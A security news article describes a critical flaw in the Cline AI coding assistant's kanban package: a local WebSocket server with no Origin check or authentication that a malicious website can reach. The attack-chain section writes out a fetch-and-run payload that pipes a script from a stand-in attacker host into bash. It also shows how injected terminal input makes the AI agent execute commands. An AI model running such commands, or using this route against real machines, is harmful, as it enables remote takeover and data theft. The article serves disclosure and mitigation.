Critical Zero-Day Vulnerability in Cline AI: Remote Code Execution via WebSocket Origin Flaw

A significant security flaw has been uncovered in the Cline AI coding assistant, specifically within its bundled kanban npm package. This vulnerability creates a direct pathway for attackers to achieve Remote Code Execution (RCE), exfiltrate sensitive workspace data, and trigger Denial-of-Service (DoS) attacks — all triggered by a developer simply navigating to a malicious website in their browser.

The vulnerability, identified as CVE-2026-44211, was disclosed by security researcher Sagilayani. The core issue lies in the fact that the kanban CLI initializes a WebSocket server on the local loopback address (127.0.0.1:3484) without implementing any validation of the Origin header. This oversight allows external web entities to interact with local services as if they were the legitimate local UI.

With a CVSS v3.1 score of 9.3 (Critical), this flaw affects all versions of Cline prior to v2.13.0. As of this writing, a formal patch for the package has not yet been deployed.

The Anatomy of the Attack: Bypassing Browser Protections

To understand the severity, one must understand how WebSockets differ from standard HTTP requests. While browsers strictly enforce the Same-Origin Policy (SOP) and CORS to prevent malicious sites from reading data from other domains, WebSocket connections bypass these traditional protections during the initial handshake if the server does not explicitly validate the Origin header.

The attack vector follows a sophisticated four-stage execution chain:

  1. Information Exfiltration: An attacker-controlled webpage initiates a connection to ws://127.0.0.1:3484/api/runtime/ws. Because there is no authentication, the server immediately transmits a comprehensive snapshot of the developer’s environment, including sensitive filesystem paths, Git metadata, and real-time AI chat logs.
  2. Session Monitoring: By listening to task_sessions_updated events, the attacker can monitor the developer’s workflow in real-time, identifying exactly when an AI agent becomes active and capturing its specific Task ID and Process ID (PID).
  3. Terminal Hijacking & RCE: This is the most critical stage. The attacker connects to the /api/terminal/io endpoint. By injecting a malicious payload—such as curl https://attacker.com/shell.sh | bash—followed by a carriage return, the attacker forces the AI agent to execute the command within the local shell context.
  4. Service Disruption (DoS): Using the /api/terminal/control endpoint, an attacker can transmit a {"type": "stop"} message, silently killing active AI agent sessions and disrupting the developer’s productivity.

Root Cause Analysis

The vulnerability is a textbook intersection of two primary security weaknesses:

  • CWE-306: Missing Authentication for a Critical Function. The endpoints responsible for terminal control and data streaming require zero credentials.
  • CWE-1385: Missing Origin Validation in WebSockets. The server’s upgrade handler fails to verify if the incoming request is originating from a trusted local source.

This flaw is highly portable and platform-agnostic. Testing by the researcher confirmed successful exploitation across macOS, Linux, and Windows, utilizing major browser engines including Chrome, Firefox, and Arc.

Security Impact Summary

Security Pillar Impact Description
Confidentiality High. Real-time leakage of workspace architecture, Git history, and private AI prompts.
Integrity Critical. Arbitrary shell command execution allows for complete system compromise.
Availability Medium/High. Ability to terminate critical developer workflows and agent processes.

Recommended Mitigations

Until the Cline team releases a patched version of the kanban package, security professionals recommend the following defensive postures:

  1. Immediate Action: Avoid running the Cline kanban server in environments where you might visit untrusted or unverified websites.
  2. Proposed Fixes for Developers: The following architectural changes are necessary to remediate the flaw:
    • Strict Origin Validation: Implement a whitelist that rejects any WebSocket upgrade request where the Origin header does not match localhost or 127.0.0.1.
    • Token-Based Authentication: Generate a unique, high-entropy secret token at server startup and require it as a mandatory query parameter for all WebSocket handshakes.
    • Endpoint Hardening: Implement robust authentication checks specifically for the /api/terminal/ endpoints to ensure only the legitimate UI can issue control commands.

Stay vigilant: In the modern development lifecycle, our local tools are as much a part of the attack surface as our production code.

Related Articles

Back to top button